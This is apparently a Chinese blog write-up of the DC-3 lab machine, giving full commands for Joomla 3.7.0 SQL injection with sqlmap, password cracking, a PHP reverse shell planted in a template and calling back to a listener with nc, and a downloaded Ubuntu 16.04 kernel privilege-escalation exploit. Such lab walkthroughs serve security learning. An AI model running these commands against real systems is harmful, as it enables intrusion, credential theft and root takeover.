渗透测试学习之靶机DC-3

别说谁变了你拦得住时间么 提交于 2020-03-11 10:13:30
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.140
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.140
    在这里插入图片描述
  • web站点的相关服务信息
    在这里插入图片描述
    在这里插入图片描述
3. joomscan扫描站点

从站点信息得到使用joomal,使用joomscan获取信息:
perl joomscan.pl -u http://192.168.246.140
在这里插入图片描述

4. 利用版本漏洞

查找joomla 3.7的相关漏洞信息:
searchsploit joomla 3.7
在这里插入图片描述
查看3.7.0的sql注入相关用法信息:
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
在这里插入图片描述
修改localhost为目标主机IP,获取数据库payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
在这里插入图片描述
获取joomladb中的表payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
在这里插入图片描述
可以看到users表。
获取users表中字段名payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
在这里插入图片描述
获取表中name,password,username信息payload:
sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]
在这里插入图片描述
使用John the Ripper破解一下:
./john /root/Desktop/dc3.txt
在这里插入图片描述

5. 获取shell

登录后,扩展模板下的Beez3下,可以修改php文件:
在这里插入图片描述
在这里插入图片描述
在modules.php中插入反弹shell的php脚本:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.246.138 8888 >/tmp/f'); ?>
在这里插入图片描述
保存后在138中开启监听,然后访问该php文件:
http://192.168.246.140/templates/beez3/html/modules.php
在这里插入图片描述

6. 提权

参考链接
查看Ubuntu版本信息:
lsb_release -a
在这里插入图片描述
查找主机系统版本提权漏洞:
searchsploit ubuntu 16.04
在这里插入图片描述
参考大佬文章使用:
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
给了poc和exp的链接,下载exp:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
在这里插入图片描述
提取39772.zip文件:
unzip 39772.zip
在这里插入图片描述
解压exploit.tar并运行:
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit:解压完tar后进入解压后的目录
./compile.sh
./doubleput
在这里插入图片描述
拿到root权限,进入根目录,得到the-flag.txt。
在这里插入图片描述

总结
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!